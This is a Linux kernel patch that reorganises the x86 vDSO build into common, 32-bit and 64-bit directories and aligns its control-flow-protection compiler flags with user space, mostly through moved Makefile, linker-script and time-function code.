- The -fcf-protection= option was "leaking" from the kernel build,
for reasons that were not clear to me. Furthermore, several
distributions ship with it set to a default value other than
"-fcf-protection=none". Make it match the configuration options
for *user space*.
Note that this patch may seem large, but the vast majority of it is
simply code movement.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-4-hpa@zytor.com
---
arch/x86/entry/vdso/Makefile | 161 +--------------
arch/x86/entry/vdso/common/Makefile.include | 89 ++++++++-
arch/x86/entry/vdso/common/note.S | 18 ++-
arch/x86/entry/vdso/common/vclock_gettime.c | 77 +++++++-
arch/x86/entry/vdso/common/vdso-layout.lds.S | 101 +++++++++-
arch/x86/entry/vdso/common/vgetcpu.c | 22 ++-
arch/x86/entry/vdso/vclock_gettime.c | 77 +-------
arch/x86/entry/vdso/vdso-layout.lds.S | 101 +---------
arch/x86/entry/vdso/vdso-note.S | 15 +-
arch/x86/entry/vdso/vdso.lds.S | 37 +---
arch/x86/entry/vdso/vdso32/Makefile | 24 ++-
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/system_call.S | 2 +-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++-
arch/x86/entry/vdso/vdso64/note.S | 1 +-
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +-
arch/x86/entry/vdso/vdso64/vdso64.lds.S | 37 +++-
arch/x86/entry/vdso/vdso64/vdsox32.lds.S | 27 ++-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +-
arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S | 178 ++++++++++++++++-
arch/x86/entry/vdso/vdso64/vgetrandom.c | 15 +-
arch/x86/entry/vdso/vdso64/vsgx.S | 150 +++++++++++++-
arch/x86/entry/vdso/vdsox32.lds.S | 27 +--
arch/x86/entry/vdso/vgetcpu.c | 22 +--
arch/x86/entry/vdso/vgetrandom-chacha.S | 178 +----------------
arch/x86/entry/vdso/vgetrandom.c | 15 +-
arch/x86/entry/vdso/vsgx.S | 150 +-------------
30 files changed, 798 insertions(+), 804 deletions(-)
create mode 100644 arch/x86/entry/vdso/common/Makefile.include
create mode 100644 arch/x86/entry/vdso/common/note.S
create mode 100644 arch/x86/entry/vdso/common/vclock_gettime.c
create mode 100644 arch/x86/entry/vdso/common/vdso-layout.lds.S
create mode 100644 arch/x86/entry/vdso/common/vgetcpu.c
delete mode 100644 arch/x86/entry/vdso/vclock_gettime.c
delete mode 100644 arch/x86/entry/vdso/vdso-layout.lds.S
delete mode 100644 arch/x86/entry/vdso/vdso-note.S
delete mode 100644 arch/x86/entry/vdso/vdso.lds.S
create mode 100644 arch/x86/entry/vdso/vdso32/Makefile
create mode 100644 arch/x86/entry/vdso/vdso64/Makefile
create mode 100644 arch/x86/entry/vdso/vdso64/note.S
create mode 100644 arch/x86/entry/vdso/vdso64/vclock_gettime.c
create mode 100644 arch/x86/entry/vdso/vdso64/vdso64.lds.S
create mode 100644 arch/x86/entry/vdso/vdso64/vdsox32.lds.S
create mode 100644 arch/x86/entry/vdso/vdso64/vgetcpu.c
create mode 100644 arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S
create mode 100644 arch/x86/entry/vdso/vdso64/vgetrandom.c
create mode 100644 arch/x86/entry/vdso/vdso64/vsgx.S
delete mode 100644 arch/x86/entry/vdso/vdsox32.lds.S
delete mode 100644 arch/x86/entry/vdso/vgetcpu.c
delete mode 100644 arch/x86/entry/vdso/vgetrandom-chacha.S
delete mode 100644 arch/x86/entry/vdso/vgetrandom.c
delete mode 100644 arch/x86/entry/vdso/vsgx.S
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index 3d9b09f..987b43f 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -3,159 +3,10 @@
# Building vDSO images for x86.
#
-# Include the generic Makefile to check the built vDSO:
-include $(srctree)/lib/vdso/Makefile.include
+# Regular kernel objects
+obj-y := vma.o extable.o
+obj-$(CONFIG_COMPAT_32) += vdso32-setup.o
-# Files to link into the vDSO:
-vobjs-y := vdso-note.o vclock_gettime.o vgetcpu.o vgetrandom.o vgetrandom-chacha.o
-vobjs32-y := vdso32/note.o vdso32/system_call.o vdso32/sigreturn.o
-vobjs32-y += vdso32/vclock_gettime.o vdso32/vgetcpu.o
-vobjs-$(CONFIG_X86_SGX) += vsgx.o
-
-# Files to link into the kernel:
-obj-y += vma.o extable.o
-
-# vDSO images to build:
-obj-$(CONFIG_X86_64) += vdso64-image.o
-obj-$(CONFIG_X86_X32_ABI) += vdsox32-image.o
-obj-$(CONFIG_COMPAT_32) += vdso32-image.o vdso32-setup.o
-
-vobjs := $(addprefix $(obj)/, $(vobjs-y))
-vobjs32 := $(addprefix $(obj)/, $(vobjs32-y))
-
-$(obj)/vdso.o: $(obj)/vdso.so
-
-targets += vdso.lds $(vobjs-y)
-targets += vdso32/vdso32.lds $(vobjs32-y)
-
-targets += $(foreach x, 64 x32 32, vdso-image-$(x).c vdso$(x).so vdso$(x).so.dbg)
-
-CPPFLAGS_vdso.lds += -P -C
-
-VDSO_LDFLAGS_vdso.lds = -m elf_x86_64 -soname linux-vdso.so.1 \
- -z max-page-size=4096
-
-$(obj)/vdso64.so.dbg: $(obj)/vdso.lds $(vobjs) FORCE
- $(call if_changed,vdso_and_check)
-
-VDSO2C = $(objtree)/arch/x86/tools/vdso2c
-
-quiet_cmd_vdso2c = VDSO2C $@
- cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
-
-$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(VDSO2C) FORCE
- $(call if_changed,vdso2c)
-
-#
-# Don't omit frame pointers for ease of userspace debugging, but do
-# optimize sibling calls.
-#
-CFL := $(PROFILING) -mcmodel=small -fPIC -O2 -fasynchronous-unwind-tables -m64 \
- $(filter -g%,$(KBUILD_CFLAGS)) -fno-stack-protector \
- -fno-omit-frame-pointer -foptimize-sibling-calls \
- -DDISABLE_BRANCH_PROFILING -DBUILD_VDSO
-
-ifdef CONFIG_MITIGATION_RETPOLINE
-ifneq ($(RETPOLINE_VDSO_CFLAGS),)
- CFL += $(RETPOLINE_VDSO_CFLAGS)
-endif
-endif
-
-$(vobjs): KBUILD_CFLAGS := $(filter-out $(PADDING_CFLAGS) $(CC_FLAGS_LTO) $(CC_FLAGS_CFI) $(RANDSTRUCT_CFLAGS) $(KSTACK_ERASE_CFLAGS) $(GCC_PLUGINS_CFLAGS) $(RETPOLINE_CFLAGS),$(KBUILD_CFLAGS)) $(CFL)
-$(vobjs): KBUILD_AFLAGS += -DBUILD_VDSO
-
-#
-# vDSO code runs in userspace and -pg doesn't help with profiling anyway.
-#
-CFLAGS_REMOVE_vclock_gettime.o = -pg
-CFLAGS_REMOVE_vdso32/vclock_gettime.o = -pg
-CFLAGS_REMOVE_vgetcpu.o = -pg
-CFLAGS_REMOVE_vdso32/vgetcpu.o = -pg
-CFLAGS_REMOVE_vsgx.o = -pg
-CFLAGS_REMOVE_vgetrandom.o = -pg
-
-#
-# X32 processes use x32 vDSO to access 64bit kernel data.
-#
-# Build x32 vDSO image:
-# 1. Compile x32 vDSO as 64bit.
-# 2. Convert object files to x32.
-# 3. Build x32 VDSO image with x32 objects, which contains 64bit codes
-# so that it can reach 64bit address space with 64bit pointers.
-#
-
-CPPFLAGS_vdsox32.lds = $(CPPFLAGS_vdso.lds)
-VDSO_LDFLAGS_vdsox32.lds = -m elf32_x86_64 -soname linux-vdso.so.1 \
- -z max-page-size=4096
-
-# x32-rebranded versions
-vobjx32s-y := $(vobjs-y:.o=-x32.o)
-
-# same thing, but in the output directory
-vobjx32s := $(addprefix $(obj)/, $(vobjx32s-y))
-
-# Convert 64bit object file to x32 for x32 vDSO.
-quiet_cmd_x32 = X32 $@
- cmd_x32 = $(OBJCOPY) -O elf32-x86-64 $< $@
-
-$(obj)/%-x32.o: $(obj)/%.o FORCE
- $(call if_changed,x32)
-
-targets += vdsox32.lds $(vobjx32s-y)
-
-$(obj)/%.so: OBJCOPYFLAGS := -S --remove-section __ex_table
-$(obj)/%.so: $(obj)/%.so.dbg FORCE
- $(call if_changed,objcopy)
-
-$(obj)/vdsox32.so.dbg: $(obj)/vdsox32.lds $(vobjx32s) FORCE
- $(call if_changed,vdso_and_check)
-
-CPPFLAGS_vdso32/vdso32.lds = $(CPPFLAGS_vdso.lds)
-VDSO_LDFLAGS_vdso32.lds = -m elf_i386 -soname linux-gate.so.1
-
-KBUILD_AFLAGS_32 := $(filter-out -m64,$(KBUILD_AFLAGS)) -DBUILD_VDSO
-$(obj)/vdso32.so.dbg: KBUILD_AFLAGS = $(KBUILD_AFLAGS_32)
-$(obj)/vdso32.so.dbg: asflags-$(CONFIG_X86_64) += -m32
-
-KBUILD_CFLAGS_32 := $(filter-out -m64,$(KBUILD_CFLAGS))
-KBUILD_CFLAGS_32 := $(filter-out -mcmodel=kernel,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out -fno-pic,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out -mfentry,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(RANDSTRUCT_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(KSTACK_ERASE_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(GCC_PLUGINS_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(RETPOLINE_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(CC_FLAGS_LTO),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(CC_FLAGS_CFI),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(PADDING_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 += -m32 -msoft-float -mregparm=0 -fpic
-KBUILD_CFLAGS_32 += -fno-stack-protector
-KBUILD_CFLAGS_32 += $(call cc-option, -foptimize-sibling-calls)
-KBUILD_CFLAGS_32 += -fno-omit-frame-pointer
-KBUILD_CFLAGS_32 += -DDISABLE_BRANCH_PROFILING
-KBUILD_CFLAGS_32 += -DBUILD_VDSO
-
-ifdef CONFIG_MITIGATION_RETPOLINE
-ifneq ($(RETPOLINE_VDSO_CFLAGS),)
- KBUILD_CFLAGS_32 += $(RETPOLINE_VDSO_CFLAGS)
-endif
-endif
-
-$(obj)/vdso32.so.dbg: KBUILD_CFLAGS = $(KBUILD_CFLAGS_32)
-
-$(obj)/vdso32.so.dbg: $(obj)/vdso32/vdso32.lds $(vobjs32) FORCE
- $(call if_changed,vdso_and_check)
-
-#
-# The DSO images are built using a special linker script.
-#
-quiet_cmd_vdso = VDSO $@
- cmd_vdso = $(LD) -o $@ \
- $(VDSO_LDFLAGS) $(VDSO_LDFLAGS_$(filter %.lds,$(^F))) \
- -T $(filter %.lds,$^) $(filter %.o,$^)
-
-VDSO_LDFLAGS = -shared --hash-style=both --build-id=sha1 --no-undefined \
- $(call ld-option, --eh-frame-hdr) -Bsymbolic -z noexecstack
-
-quiet_cmd_vdso_and_check = VDSO $@
- cmd_vdso_and_check = $(cmd_vdso); $(cmd_vdso_check)
+# vDSO directories
+obj-$(CONFIG_X86_64) += vdso64/
+obj-$(CONFIG_COMPAT_32) += vdso32/
diff --git a/arch/x86/entry/vdso/common/Makefile.include b/arch/x86/entry/vdso/common/Makefile.include
new file mode 100644
index 0000000..3514b4a
--- /dev/null
+++ b/arch/x86/entry/vdso/common/Makefile.include
@@ -0,0 +1,89 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# Building vDSO images for x86.
+#
+
+# Include the generic Makefile to check the built vDSO:
+include $(srctree)/lib/vdso/Makefile.include
+
+obj-y += $(foreach x,$(vdsos-y),vdso$(x)-image.o)
+
+targets += $(foreach x,$(vdsos-y),vdso$(x)-image.c vdso$(x).so vdso$(x).so.dbg vdso$(x).lds)
+targets += $(vobjs-y)
+
+# vobjs-y with $(obj)/ prepended
+vobjs := $(addprefix $(obj)/,$(vobjs-y))
+
+# Options for vdso*.lds
+CPPFLAGS_VDSO_LDS := -P -C -I$(src)/..
+$(obj)/%.lds : KBUILD_CPPFLAGS += $(CPPFLAGS_VDSO_LDS)
+
+#
+# Options from KBUILD_[AC]FLAGS that should *NOT* be kept
+#
+flags-remove-y += \
+ -D__KERNEL__ -mcmodel=kernel -mregparm=3 \
+	-fno-pic -fno-PIC -fno-pie -fno-PIE \
+ -mfentry -pg \
+	$(RANDSTRUCT_CFLAGS) $(GCC_PLUGINS_CFLAGS) $(KSTACK_ERASE_CFLAGS) \
+ $(RETPOLINE_CFLAGS) $(CC_FLAGS_LTO) $(CC_FLAGS_CFI) \
+ $(PADDING_CFLAGS)
+
+#
+# Don't omit frame pointers for ease of userspace debugging, but do
+# optimize sibling calls.
+#
+flags-y += -D__DISABLE_EXPORTS
+flags-y += -DDISABLE_BRANCH_PROFILING
+flags-y += -DBUILD_VDSO
+flags-y += -I$(src)/.. -I$(srctree)
+flags-y += -O2 -fpic
+flags-y += -fno-stack-protector
+flags-y += -fno-omit-frame-pointer
+flags-y += -foptimize-sibling-calls
+flags-y += -fasynchronous-unwind-tables
+
+# Reset cf protections enabled by compiler default
+flags-y += $(call cc-option, -fcf-protection=none)
+flags-$(CONFIG_X86_USER_SHADOW_STACK) += $(call cc-option, -fcf-protection=return)
+# When user space IBT is supported, enable this.
+# flags-$(CONFIG_USER_IBT) += $(call cc-option, -fcf-protection=branch)
+
+flags-$(CONFIG_MITIGATION_RETPOLINE) += $(RETPOLINE_VDSO_CFLAGS)
+
+# These need to be conditional on $(vobjs) as they do not apply to
+# the output vdso*-image.o files which are standard kernel objects.
+$(vobjs) : KBUILD_AFLAGS := \
+ $(filter-out $(flags-remove-y),$(KBUILD_AFLAGS)) $(flags-y)
+$(vobjs) : KBUILD_CFLAGS := \
+ $(filter-out $(flags-remove-y),$(KBUILD_CFLAGS)) $(flags-y)
+
+#
+# The VDSO images are built using a special linker script.
+#
+VDSO_LDFLAGS := -shared --hash-style=both --build-id=sha1 --no-undefined \
+ $(call ld-option, --eh-frame-hdr) -Bsymbolic -z noexecstack
+
+quiet_cmd_vdso = VDSO $@
+ cmd_vdso = $(LD) -o $@ \
+ $(VDSO_LDFLAGS) $(VDSO_LDFLAGS_$*) \
+ -T $(filter %.lds,$^) $(filter %.o,$^)
+quiet_cmd_vdso_and_check = VDSO $@
+ cmd_vdso_and_check = $(cmd_vdso); $(cmd_vdso_check)
+
+$(obj)/vdso%.so.dbg: $(obj)/vdso%.lds FORCE
+ $(call if_changed,vdso_and_check)
+
+$(obj)/%.so: OBJCOPYFLAGS := -S --remove-section __ex_table
+$(obj)/%.so: $(obj)/%.so.dbg FORCE
+ $(call if_changed,objcopy)
+
+VDSO2C = $(objtree)/arch/x86/tools/vdso2c
+
+quiet_cmd_vdso2c = VDSO2C $@
+ cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
+
+$(obj)/%-image.c: $(obj)/%.so.dbg $(obj)/%.so $(VDSO2C) FORCE
+ $(call if_changed,vdso2c)
+
+$(obj)/%-image.o: $(obj)/%-image.c
diff --git a/arch/x86/entry/vdso/common/note.S b/arch/x86/entry/vdso/common/note.S
new file mode 100644
index 0000000..2cbd399
--- /dev/null
+++ b/arch/x86/entry/vdso/common/note.S
@@ -0,0 +1,18 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * This supplies .note.* sections to go into the PT_NOTE inside the vDSO text.
+ * Here we can supply some information useful to userland.
+ */
+
+#include <linux/build-salt.h>
+#include <linux/version.h>
+#include <linux/elfnote.h>
+
+/* Ideally this would use UTS_NAME, but using a quoted string here
+ doesn't work. Remember to change this when changing the
+ kernel's name. */
+ELFNOTE_START(Linux, 0, "a")
+ .long LINUX_VERSION_CODE
+ELFNOTE_END
+
+BUILD_SALT
diff --git a/arch/x86/entry/vdso/common/vclock_gettime.c b/arch/x86/entry/vdso/common/vclock_gettime.c
new file mode 100644
index 0000000..0debc19
--- /dev/null
+++ b/arch/x86/entry/vdso/common/vclock_gettime.c
@@ -0,0 +1,77 @@
+// SPDX-License-Identifier: GPL-2.0-only
+/*
+ * Fast user context implementation of clock_gettime, gettimeofday, and time.
+ *
+ * Copyright 2006 Andi Kleen, SUSE Labs.
+ * Copyright 2019 ARM Limited
+ *
+ * 32 Bit compat layer by Stefani Seibold <stefani@seibold.net>
+ * sponsored by Rohde & Schwarz GmbH & Co. KG Munich/Germany
+ */
+#include <linux/time.h>
+#include <linux/kernel.h>
+#include <linux/types.h>
+#include <vdso/gettime.h>
+
+#include "../../../../lib/vdso/gettimeofday.c"
+
+int __vdso_gettimeofday(struct __kernel_old_timeval *tv, struct timezone *tz)
+{
+ return __cvdso_gettimeofday(tv, tz);
+}
+
+int gettimeofday(struct __kernel_old_timeval *, struct timezone *)
+ __attribute__((weak, alias("__vdso_gettimeofday")));
+
+__kernel_old_time_t __vdso_time(__kernel_old_time_t *t)
+{
+ return __cvdso_time(t);
+}
+
+__kernel_old_time_t time(__kernel_old_time_t *t) __attribute__((weak, alias("__vdso_time")));
+
+
+#if defined(CONFIG_X86_64) && !defined(BUILD_VDSO32_64)
+/* both 64-bit and x32 use these */
+int __vdso_clock_gettime(clockid_t clock, struct __kernel_timespec *ts)
+{
+ return __cvdso_clock_gettime(clock, ts);
+}
+
+int clock_gettime(clockid_t, struct __kernel_timespec *)
+ __attribute__((weak, alias("__vdso_clock_gettime")));
+
+int __vdso_clock_getres(clockid_t clock,
+ struct __kernel_timespec *res)
+{
+ return __cvdso_clock_getres(clock, res);
+}
+int clock_getres(clockid_t, struct __kernel_timespec *)
+ __attribute__((weak, alias("__vdso_clock_getres")));
+
+#else
+/* i386 only */
+int __vdso_clock_gettime(clockid_t clock, struct old_timespec32 *ts)
+{
+ return __cvdso_clock_gettime32(clock, ts);
+}
+
+int clock_gettime(clockid_t, struct old_timespec32 *)
+ __attribute__((weak, alias("__vdso_clock_gettime")));
+
+int __vdso_clock_gettime64(clockid_t clock, struct __kernel_timespec *ts)
+{
+ return __cvdso_clock_gettime(clock, ts);
+}
+
+int clock_gettime64(clockid_t, struct __kernel_timespec *)
+ __attribute__((weak, alias("__vdso_clock_gettime64")));
+
+int __vdso_clock_getres(clockid_t clock, struct old_timespec32 *res)
+{
+ return __cvdso_clock_getres_time32(clock, res);
+}
+
+int clock_getres(clockid_t, struct old_timespec32 *)
+ __attribute__((weak, alias("__vdso_clock_getres")));
+#endif
diff --git a/arch/x86/entry/vdso/common/vdso-layout.lds.S b/arch/x86/entry/vdso/common/vdso-layout.lds.S
new file mode 100644
index 0000000..ec1ac19
--- /dev/null
+++ b/arch/x86/entry/vdso/common/vdso-layout.lds.S
@@ -0,0 +1,101 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+#include <asm/vdso.h>
+#include <asm/vdso/vsyscall.h>
+#include <vdso/datapage.h>
+
+/*
+ * Linker script for vDSO. This is an ELF shared object prelinked to
+ * its virtual address, and with only one read-only segment.
+ * This script controls its layout.
+ */
+
+SECTIONS
+{
+ /*
+ * User/kernel shared data is before the vDSO. This may be a little
+ * uglier than putting it after the vDSO, but it avoids issues with
+ * non-allocatable things that dangle past the end of the PT_LOAD
+ * segment.
+ */
+
+ VDSO_VVAR_SYMS
+
+ vclock_pages = VDSO_VCLOCK_PAGES_START(vdso_u_data);
+ pvclock_page = vclock_pages + VDSO_PAGE_PVCLOCK_OFFSET * PAGE_SIZE;
+ hvclock_page = vclock_pages + VDSO_PAGE_HVCLOCK_OFFSET * PAGE_SIZE;
+
+ . = SIZEOF_HEADERS;
+
+ .hash : { *(.hash) } :text
+ .gnu.hash : { *(.gnu.hash) }
+ .dynsym : { *(.dynsym) }
+ .dynstr : { *(.dynstr) }
+ .gnu.version : { *(.gnu.version) }
+ .gnu.version_d : { *(.gnu.version_d) }
+ .gnu.version_r : { *(.gnu.version_r) }
+
+ .dynamic : { *(.dynamic) } :text :dynamic
+
+ .rodata : {
+ *(.rodata*)
+ *(.data*)
+ *(.sdata*)
+ *(.got.plt) *(.got)
+ *(.gnu.linkonce.d.*)
+ *(.bss*)
+ *(.dynbss*)
+ *(.gnu.linkonce.b.*)
+ } :text
+
+ /*
+ * Discard .note.gnu.property sections which are unused and have
+ * different alignment requirement from vDSO note sections.
+ */
+ /DISCARD/ : {
+ *(.note.gnu.property)
+ }
+ .note : { *(.note.*) } :text :note
+
+ .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
+ .eh_frame : { KEEP (*(.eh_frame)) } :text
+
+
+ /*
+ * Text is well-separated from actual data: there's plenty of
+ * stuff that isn't used at runtime in between.
+ */
+
+ .text : {
+ *(.text*)
+ } :text =0x90909090,
+
+
+
+ .altinstructions : { *(.altinstructions) } :text
+ .altinstr_replacement : { *(.altinstr_replacement) } :text
+
+ __ex_table : { *(__ex_table) } :text
+
+ /DISCARD/ : {
+ *(.discard)
+ *(.discard.*)
+ *(__bug_table)
+ }
+}
+
+/*
+ * Very old versions of ld do not recognize this name token; use the constant.
+ */
+#define PT_GNU_EH_FRAME 0x6474e550
+
+/*
+ * We must supply the ELF program headers explicitly to get just one
+ * PT_LOAD segment, and set the flags explicitly to make segments read-only.
+ */
+PHDRS
+{
+ text PT_LOAD FLAGS(5) FILEHDR PHDRS; /* PF_R|PF_X */
+ dynamic PT_DYNAMIC FLAGS(4); /* PF_R */
+ note PT_NOTE FLAGS(4); /* PF_R */
+ eh_frame_hdr PT_GNU_EH_FRAME;
+}
diff --git a/arch/x86/entry/vdso/common/vgetcpu.c b/arch/x86/entry/vdso/common/vgetcpu.c
new file mode 100644
index 0000000..e464030
--- /dev/null
+++ b/arch/x86/entry/vdso/common/vgetcpu.c
@@ -0,0 +1,22 @@
+// SPDX-License-Identifier: GPL-2.0-only
+/*
+ * Copyright 2006 Andi Kleen, SUSE Labs.
+ *
+ * Fast user context implementation of getcpu()
+ */
+
+#include <linux/kernel.h>
+#include <linux/getcpu.h>
+#include <asm/segment.h>
+#include <vdso/processor.h>
+
+notrace long
+__vdso_getcpu(unsigned *cpu, unsigned *node, struct getcpu_cache *unused)
+{
+ vdso_read_cpunode(cpu, node);
+
+ return 0;
+}
+
+long getcpu(unsigned *cpu, unsigned *node, struct getcpu_cache *tcache)
+ __attribute__((weak, alias("__vdso_getcpu")));
diff --git a/arch/x86/entry/vdso/vclock_gettime.c b/arch/x86/entry/vdso/vclock_gettime.c
deleted file mode 100644
index 0debc19..0000000
--- a/arch/x86/entry/vdso/vclock_gettime.c
+++ /dev/null
@@ -1,77 +0,0 @@
-// SPDX-License-Identifier: GPL-2.0-only
-/*
- * Fast user context implementation of clock_gettime, gettimeofday, and time.
- *
- * Copyright 2006 Andi Kleen, SUSE Labs.
- * Copyright 2019 ARM Limited
- *
- * 32 Bit compat layer by Stefani Seibold <stefani@seibold.net>
- * sponsored by Rohde & Schwarz GmbH & Co. KG Munich/Germany
- */
-#include <linux/time.h>
-#include <linux/kernel.h>
-#include <linux/types.h>
-#include <vdso/gettime.h>
-
-#include "../../../../lib/vdso/gettimeofday.c"
-
-int __vdso_gettimeofday(struct __kernel_old_timeval *tv, struct timezone *tz)
-{
- return __cvdso_gettimeofday(tv, tz);
-}
-
-int gettimeofday(struct __kernel_old_timeval *, struct timezone *)
- __attribute__((weak, alias("__vdso_gettimeofday")));
-
-__kernel_old_time_t __vdso_time(__kernel_old_time_t *t)
-{
- return __cvdso_time(t);
-}
-
-__kernel_old_time_t time(__kernel_old_time_t *t) __attribute__((weak, alias("__vdso_time")));
-
-
-#if defined(CONFIG_X86_64) && !defined(BUILD_VDSO32_64)
-/* both 64-bit and x32 use these */
-int __vdso_clock_gettime(clockid_t clock, struct __kernel_timespec *ts)
-{
- return __cvdso_clock_gettime(clock, ts);
-}
-
-int clock_gettime(clockid_t, struct __kernel_timespec *)
- __attribute__((weak, alias("__vdso_clock_gettime")));
-
-int __vdso_clock_getres(clockid_t clock,
- struct __kernel_timespec *res)
-{
- return __cvdso_clock_getres(clock, res);
-}
-int clock_getres(clockid_t, struct __kernel_timespec *)
- __attribute__((weak, alias("__vdso_clock_getres")));
-
-#else
-/* i386 only */
-int __vdso_clock_gettime(clockid_t clock, struct old_timespec32 *ts)
-{
- return __cvdso_clock_gettime32(clock, ts);
-}
-
-int clock_gettime(clockid_t, struct old_timespec32 *)
- __attribute__((weak, alias("__vdso_clock_gettime")));
-
-int __vdso_clock_gettime64(clockid_t clock, struct __kernel_timespec *ts)
-{
- return __cvdso_clock_gettime(clock, ts);
-}
-
-int clock_gettime64(clockid_t, struct __kernel_timespec *)
- __attribute__((weak, alias("__vdso_clock_gettime64")));
-
-int __vdso_clock_getres(clockid_t clock, struct old_timespec32 *res)
-{
- return __cvdso_clock_getres_time32(clock, res);
-}
-
-int clock_getres(clockid_t, struct old_timespec32 *)
- __attribute__((weak, alias("__vdso_clock_getres")));
-#endif
diff --git a/arch/x86/entry/vdso/vdso-layout.lds.S b/arch/x86/entry/vdso/vdso-layout.lds.S
deleted file mode 100644
index ec1ac19..0000000
--- a/arch/x86/entry/vdso/vdso-layout.lds.S
+++ /dev/null
@@ -1,101 +0,0 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-#include <asm/vdso.h>
-#include <asm/vdso/vsyscall.h>
-#include <vdso/datapage.h>
-
-/*
- * Linker script for vDSO. This is an ELF shared object prelinked to
- * its virtual address, and with only one read-only segment.
- * This script controls its layout.
- */
-
-SECTIONS
-{
- /*
- * User/kernel shared data is before the vDSO. This may be a little
- * uglier than putting it after the vDSO, but it avoids issues with
- * non-allocatable things that dangle past the end of the PT_LOAD
- * segment.
- */
-
- VDSO_VVAR_SYMS
-
- vclock_pages = VDSO_VCLOCK_PAGES_START(vdso_u_data);
- pvclock_page = vclock_pages + VDSO_PAGE_PVCLOCK_OFFSET * PAGE_SIZE;
- hvclock_page = vclock_pages + VDSO_PAGE_HVCLOCK_OFFSET * PAGE_SIZE;
-
- . = SIZEOF_HEADERS;
-
- .hash : { *(.hash) } :text
- .gnu.hash : { *(.gnu.hash) }
- .dynsym : { *(.dynsym) }
- .dynstr : { *(.dynstr) }
- .gnu.version : { *(.gnu.version) }
- .gnu.version_d : { *(.gnu.version_d) }
- .gnu.version_r : { *(.gnu.version_r) }
-
- .dynamic : { *(.dynamic) } :text :dynamic
-
- .rodata : {
- *(.rodata*)
- *(.data*)
- *(.sdata*)
- *(.got.plt) *(.got)
- *(.gnu.linkonce.d.*)
- *(.bss*)
- *(.dynbss*)
- *(.gnu.linkonce.b.*)
- } :text
-
- /*
- * Discard .note.gnu.property sections which are unused and have
- * different alignment requirement from vDSO note sections.
- */
- /DISCARD/ : {
- *(.note.gnu.property)
- }
- .note : { *(.note.*) } :text :note
-
- .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
- .eh_frame : { KEEP (*(.eh_frame)) } :text
-
-
- /*
- * Text is well-separated from actual data: there's plenty of
- * stuff that isn't used at runtime in between.
- */
-
- .text : {
- *(.text*)
- } :text =0x90909090,
-
-
-
- .altinstructions : { *(.altinstructions) } :text
- .altinstr_replacement : { *(.altinstr_replacement) } :text
-
- __ex_table : { *(__ex_table) } :text
-
- /DISCARD/ : {
- *(.discard)
- *(.discard.*)
- *(__bug_table)
- }
-}
-
-/*
- * Very old versions of ld do not recognize this name token; use the constant.
- */
-#define PT_GNU_EH_FRAME 0x6474e550
-
-/*
- * We must supply the ELF program headers explicitly to get just one
- * PT_LOAD segment, and set the flags explicitly to make segments read-only.
- */
-PHDRS
-{
- text PT_LOAD FLAGS(5) FILEHDR PHDRS; /* PF_R|PF_X */
- dynamic PT_DYNAMIC FLAGS(4); /* PF_R */
- note PT_NOTE FLAGS(4); /* PF_R */
- eh_frame_hdr PT_GNU_EH_FRAME;
-}
diff --git a/arch/x86/entry/vdso/vdso-note.S b/arch/x86/entry/vdso/vdso-note.S
deleted file mode 100644
index 7942317..0000000
--- a/arch/x86/entry/vdso/vdso-note.S
+++ /dev/null
@@ -1,15 +0,0 @@
-/*
- * This supplies .note.* sections to go into the PT_NOTE inside the vDSO text.
- * Here we can supply some information useful to userland.
- */
-
-#include <linux/build-salt.h>
-#include <linux/uts.h>
-#include <linux/version.h>
-#include <linux/elfnote.h>
-
-ELFNOTE_START(Linux, 0, "a")
- .long LINUX_VERSION_CODE
-ELFNOTE_END
-
-BUILD_SALT
diff --git a/arch/x86/entry/vdso/vdso.lds.S b/arch/x86/entry/vdso/vdso.lds.S
deleted file mode 100644
index 0bab5f4..0000000
--- a/arch/x86/entry/vdso/vdso.lds.S
+++ /dev/null
@@ -1,37 +0,0 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-/*
- * Linker script for 64-bit vDSO.
- * We #include the file to define the layout details.
- *
- * This file defines the version script giving the user-exported symbols in
- * the DSO.
- */
-
-#define BUILD_VDSO64
-
-#include "vdso-layout.lds.S"
-
-/*
- * This controls what userland symbols we export from the vDSO.
- */
-VERSION {
- LINUX_2.6 {
- global:
- clock_gettime;
- __vdso_clock_gettime;
- gettimeofday;
- __vdso_gettimeofday;
- getcpu;
- __vdso_getcpu;
- time;
- __vdso_time;
